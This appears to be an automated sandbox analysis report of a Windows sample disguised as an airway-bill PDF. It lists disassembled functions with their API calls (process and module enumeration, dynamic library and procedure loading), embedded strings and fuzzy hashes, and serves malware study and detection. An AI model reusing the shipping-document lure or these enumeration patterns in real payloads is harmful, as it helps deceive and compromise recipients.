                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                          • API String ID: 667068680-597814768
                                                                                          • Opcode ID: ed954c457a3746b6f31076ac0ff8d0fa614a4017c2384b4a81fd3a494b4e27be
                                                                                          • Instruction ID: 99079b6bbf85c3d76b8a976ca7318c4fb072cda09fdd69befb6016e753efa11d
                                                                                          • Opcode Fuzzy Hash: ed954c457a3746b6f31076ac0ff8d0fa614a4017c2384b4a81fd3a494b4e27be
                                                                                          • Instruction Fuzzy Hash: 00310EB1AC4721AFFB02EFB8D894E2737AEFB867547010965A006CF244DB74D8508F56
                                                                                          Function 029358B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02936BD0,02930000,0295D790), ref: 029358D1
                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029358E8
                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02935918
                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 0293597C
                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359B2
                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359C5
                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359D7
                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359E3
                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000), ref: 02935A17
                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0), ref: 02935A23
                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02935A45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                          • API String ID: 3245196872-1565342463
                                                                                          • Opcode ID: cf9783aafdd26a10d438f85a1d0eeedb19ae0d70007c05b693ab0189ebb1114d
                                                                                          • Instruction ID: d52e4841e42aefbc9998abab40c90579ae68a7a64e4ab488a1ed83e791415c94
                                                                                          • Opcode Fuzzy Hash: cf9783aafdd26a10d438f85a1d0eeedb19ae0d70007c05b693ab0189ebb1114d
                                                                                          • Instruction Fuzzy Hash: AD416CB2D00259AFDB12DAE8CC88ADEB3BEAB4C350F4545A5E548E7251E7709E44CF50
                                                                                          Function 02935B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02935B94
                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02935BA1
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02935BA7
                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02935BD2
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C19
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C29
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C51
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C61
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02935C87
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02935C97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                          • API String ID: 1599918012-2375825460
                                                                                          • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                          • Instruction ID: d27c58e2ba9abb3e1e73786c92812ce2aea1c9d9cbbcc70e761f562873db2343
                                                                                          • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                          • Instruction Fuzzy Hash: 5031C471E4021C2AEF27D6B89C85FEF77AD9B48384F4501E19608E6084DB749E848F90
                                                                                          Function 02937F5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02937F7D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: DiskFreeSpace
                                                                                          • String ID:
                                                                                          • API String ID: 1705453755-0
                                                                                          • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                                                          • Instruction ID: 4d7d1c461d888aa70a2c275e3f1e30e6cd24f5f833e28c21106a63f3c7094ae7
                                                                                          • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                                                          • Instruction Fuzzy Hash: E211C0B5A00209AF9B05CF99C9819AFF7F9EFCC704B14C569A505EB254E6719E01CB90
                                                                                          Function 0293A74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                          • Instruction ID: 842a6b39fc78413a1e36fd7bb94cd21bb3f08858ddb3cb23df47a3412bf19910
                                                                                          • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                          • Instruction Fuzzy Hash: 10E0D836B0021417D712A5585C81DFA735D979C350F00417EBD45C7340EEA09D404AE9
                                                                                          Function 0293B714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVersionExA.KERNEL32(?,0295C106,00000000,0295C11E), ref: 0293B722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Version
                                                                                          • String ID:
                                                                                          • API String ID: 1889659487-0
                                                                                          • Opcode ID: a193df5cdd637d2fc0d06f2695cb7a7f73b6bcbf80d021beeb6760671d310a93
                                                                                          • Instruction ID: b505500e1dc03ab35f40e8c061b9ac1f7eb3886b4487a1d4e5b2a99d3b493ab2
                                                                                          • Opcode Fuzzy Hash: a193df5cdd637d2fc0d06f2695cb7a7f73b6bcbf80d021beeb6760671d310a93
                                                                                          • Instruction Fuzzy Hash: ABF0F8B4A483119FC351DF28D541A297BE5FB88B14F408D29E899C73A0E734D864CF62
                                                                                          Function 0293A798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0293BDFA,00000000,0293C013,?,?,00000000,00000000), ref: 0293A7AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                          • Instruction ID: d454b40da67e7f6dd99f36a176a3cfe006371e295b2ad54e3a278b81276b9ee8
                                                                                          • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                          • Instruction Fuzzy Hash: 2CD05EA630E2603AA221515A2D94D7B5AECCAC97A1F00843EF589C6200D2008C0696B5
                                                                                          Function 02939194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID:
                                                                                          • API String ID: 481472006-0
                                                                                          • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                          • Instruction ID: a80ca6194bf17a763ffba3eb98e34fce3d80349a3233ec0a2657e2b4c4fa6aa7
                                                                                          • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                          • Instruction Fuzzy Hash: EEA01100808C20228A803B2A0C0223A3088A880B20FC80F80A8F8802E0EE2E022080EB
                                                                                          Function 029320C4 Relevance: .1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                          Function 0293D21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0293D225
                                                                                            • Part of subcall function 0293D1F0: GetProcAddress.KERNEL32(00000000), ref: 0293D209
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                          • API String ID: 1646373207-1918263038
                                                                                          • Opcode ID: 617cf56d1f4866a89d874227860a2e995ef6eafddc51f0ebdaf86850e09e7bda
                                                                                          • Instruction ID: ca34bed7167dee6bf4cc8a73deb60c6416335c1665a9048e47f36266c772e8de
                                                                                          • Opcode Fuzzy Hash: 617cf56d1f4866a89d874227860a2e995ef6eafddc51f0ebdaf86850e09e7bda
                                                                                          • Instruction Fuzzy Hash: A541E562A883455B560BBAAD742453B7BDEEB88730360451BB41CDA685DE30BC618E3D
                                                                                          Function 02946E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02946E66
                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02946E77
                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02946E87
                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02946E97
                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02946EA7
                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02946EB7
                                                                                          • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02946EC7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                          • API String ID: 667068680-2233174745
                                                                                          • Opcode ID: c2c90094aa0ef080fa94aa202237674de04fca2b830f1ff385961db29b29c9b0
                                                                                          • Instruction ID: 87296c6d03d97a10d5fed9dd9565e52b8b15c44da45c63936b31decc584c7e2c
                                                                                          • Opcode Fuzzy Hash: c2c90094aa0ef080fa94aa202237674de04fca2b830f1ff385961db29b29c9b0
                                                                                          • Instruction Fuzzy Hash: D6F050E2B8D7217EB7027F709C81C37279D95D268C7001965744255942DEB588604F68
                                                                                          Function 02932530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029328CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                          • API String ID: 2030045667-32948583
                                                                                          • Opcode ID: d7758e1d48801f5972e78e8f64d8277d2e642aa9d20c45163caaac10faa34d18
                                                                                          • Instruction ID: 5ea9a82ee32ca42fddbda070bdbccad8258cfc7b9dd851acd0c20541d7928982
                                                                                          • Opcode Fuzzy Hash: d7758e1d48801f5972e78e8f64d8277d2e642aa9d20c45163caaac10faa34d18
                                                                                          • Instruction Fuzzy Hash: 54A1E330E043648BDF22AB2CCC84B99B7E9EB49714F1440E5ED49AB285CB759EC9CF51
                                                                                          Function 0293252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • , xrefs: 02932814
                                                                                          • 7, xrefs: 029326A1
                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02932849
                                                                                          • bytes: , xrefs: 0293275D
                                                                                          • An unexpected memory leak has occurred. , xrefs: 02932690
                                                                                          • The unexpected small block leaks are:, xrefs: 02932707
                                                                                          • Unexpected Memory Leak, xrefs: 029328C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                          • API String ID: 0-2723507874
                                                                                          • Opcode ID: 9be25cf62253027e4e79c09b2bc0c21d78c98b918f4e07fa2ced92a50e432b95
                                                                                          • Instruction ID: fae0dbd35f9c2ed9964267dfa90403860c6951b0d40e4c70c8954f9fc147812d
                                                                                          • Opcode Fuzzy Hash: 9be25cf62253027e4e79c09b2bc0c21d78c98b918f4e07fa2ced92a50e432b95
                                                                                          • Instruction Fuzzy Hash: 3071A130E042A88FDB229B2CCC84BD9BAE9EB49714F1441E5D949DB281DB754EC5CF51
                                                                                          Function 0293BD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(00000000,0293C013,?,?,00000000,00000000), ref: 0293BD7E
                                                                                            • Part of subcall function 0293A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
